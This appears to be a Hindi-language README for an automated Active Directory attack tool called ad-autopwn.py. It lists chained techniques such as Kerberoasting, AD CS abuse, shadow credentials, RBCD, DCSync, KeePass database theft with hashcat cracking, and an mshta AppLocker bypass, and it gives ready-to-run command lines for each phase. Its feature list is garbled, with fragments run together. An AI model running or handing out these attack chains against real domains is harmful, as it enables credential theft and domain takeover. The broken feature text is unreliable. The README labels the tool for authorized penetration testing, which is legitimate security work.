
# स्वचालित Active Directory आक्रमण श्रृंखला: शून्य-प्रमाणीकरण से Domain Admin तक 25+ तकनीकों की श्रृंखला, जिसमें Kerberoast, AD CS ESC1-16, Shadow Credentials, RBCD, DCSync, और Synacktiv 2026 reflection exploits शामिल हैं। केवल अधिकृत पेंटेस्टिंग के लिए।
शून्य-प्रमाणीकरण से डोमेन व्यवस्थापक तक — स्वचालित सक्रिय निर्देशिका आक्रमण श्रृंखला
एक पूरी तरह से स्वचालित पैठ परीक्षण उपकरण जो सक्रिय निर्देशिका वातावरण से समझौता करने के लिए 25+ आक्रमण तकनीकों को जोड़ता है। अधिकृत सुरक्षा मूल्यांकनों के लिए डिज़ाइन किया गया।
_ ___ _ _ ___
/_\ | \ /_\ _ _| |_ ___| _ \__ __ ___ _
/ _ \| |) | / _ \ || | _/ _ \ _/\ V V / ' \
/_/ \_\___/ /_/ \_\_,_|\__\___/_| \_/\_/|_||_|
⚡ शून्य-प्रमाणीकरण से डोमेन व्यवस्थापक — आक्रमण श्रृंखला
खोजें | सूँघें | ARP | WPAD | WSUS | PXE | AD CS | SCCM | Roast
BloodHound | Reflect | Loot | RBCD+KCD | DCSync | DPAPI
DONT_REQ_PREAUTH है)--spray-password के माध्यम से).library-ms / .theme / .url फ़ाइलें लिखने योग्य शेयरों परbloodhound-python -c All संग्रह + ZIP विश्लेषणWriteSPN, AddKeyCredentialLink, GenericAll/Write, WriteDacl/Owner, WriteAccountRestrictions, AddAllowedToAct, ForceChangePasswordWriteSPN → घोस्ट-SPN अपग्रेड (CVE-2025-58726)AddKeyCredentialLink → शैडो क्रेडेंशियल → PKINIT → NT हैशकंप्यूटर पर GenericAll / WriteAccountRestrictions → RBCD चेन → एडमिन TGS-altservice पुनर्लेखन, एक चरण में-altservice के माध्यम से$-प्रत्यय पुनर्प्रयास → लिनक्स उपयोगकर्ता के लिए स्वचालित रूप से बनाए गए <user>$ मशीन खाते के माध्यम से TGT → GSSAPI SSHGet-CimInstance Win32_Process nxc -x के माध्यम से; mysql/sqlcmd/runas/KeePass/--password शैली फ्लैग में पासवर्ड के लिए रेगेक्स-ग्रेपC:\Users में *.kdbx ढूँढें, smbclient के माध्यम से डाउनलोड करें, keepass2john | hashcat -m 13400# पूरी तरह से स्वचालित — शून्य-क्रेड चेन (सब कुछ स्वचालित रूप से खोजता है)
sudo ./ad-autopwn.py
# क्रेडेंशियल के साथ — पूर्ण चेन
./ad-autopwn.py -u jsmith -p 'P@ss123' -d corp.local --dc-ip 10.0.0.1
# AWS / VPC लैब (लेयर 2 हमले अवरुद्ध) — ऑटो-डिस्कवरी अभी भी काम करती है
sudo ./ad-autopwn.py --no-arp --no-wpad
# प्री-ऑथ क्रेडेंशियल खोज (लॉकआउट-सुरक्षित)
sudo ./ad-autopwn.py --phase discover --no-arp --no-wpad
# BloodHound ग्राफ संग्रह + स्वचालित उच्च-मूल्य विश्लेषण
./ad-autopwn.py --phase bloodhound -u user -p pass -d corp.local \
--dc-ip 10.0.0.1 --dc-fqdn dc01.corp.local
# डॉलर टिकट — स्वचालित रूप से बनाए गए root$ मशीन खाते के माध्यम से 'root' के लिए TGT
./ad-autopwn.py -u user -p pass -d corp.local --dc-ip 10.0.0.1 \
--phase dollar-ticket --target-user root
# RBCD+KCD चेन — पूर्ण घोस्ट-SPN + RBCD + altservice पुनर्लेखन, एक शॉट
./ad-autopwn.py -u user -p pass -d corp.local --dc-ip 10.0.0.1 \
--phase rbcd-kcd -T VHAGAR$ --alt-spn HTTP/vhagar.corp.local
# AppLocker बायपास
./ad-autopwn.py -u user -p pass --applocker --lolbin mshta --custom-cmd "whoami"
# ड्राई रन (प्रत्येक कमांड प्रिंट करें, कुछ न चलाएँ — यहाँ तक कि पृष्ठभूमि प्रक्रियाएँ भी)
./ad-autopwn.py --dry-run -u user -p pass -d corp.local --dc-ip 10.0.0.1